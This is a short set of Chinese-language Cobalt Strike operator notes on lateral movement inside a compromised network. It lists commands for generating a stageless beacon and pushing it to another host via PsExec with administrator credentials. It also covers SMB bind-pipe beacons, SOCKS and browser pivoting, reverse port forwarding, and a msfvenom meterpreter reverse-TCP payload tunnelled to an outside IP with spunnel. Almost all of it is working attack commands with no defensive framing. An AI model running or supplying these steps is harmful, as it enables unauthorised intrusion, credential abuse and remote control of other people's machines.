Pivoting ->Listener新建一条已有权限机器的监听器

选择 Attacks->Packages->Windows Executable(Stageless) 

上传生成的payload到已上线的目标机中，上传PsExec.exe
beacon>shell C:\psexec.exe -accepteula \\10.1.1.105 -u administrator -p xxx -d -c C:\beacon.exe

新建监听器(bind)windows/beacon_smb/bind_pipe
执行
>psexec 机器名 ADMIN$/c$ bind

>ssh 10.1.1.98:22 root admin

在你的 teamserver 的给定端口上启动一个 SOCKS 服务器，通过指定的 Beacon 传输流量。 在 /etc/proxychains.conf 中设置 teamserver/port 配置以方便使用		
beacon > socks [PORT]
通过指定的 Internet Explorer 进程代理浏览器流量
beacon > browserpivot [pid] [x86|x64]

绑定到 Beacon 主机上的指定端口，并将任何传入的连接转发到被转发的主机和端口
beacon > rportfwd [bind port] [forward host] [forward port]

spunnel : 生成一个代理并创建一个到其控制器的反向端口转发隧道
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin
beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin

spunnel_local: 生成一个代理并创建一个反向端口转发，通过您的 Cobalt Strike 客户端隧道传输到其控制器
然后你可以在你的 MSF multi handler上处理连接
beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin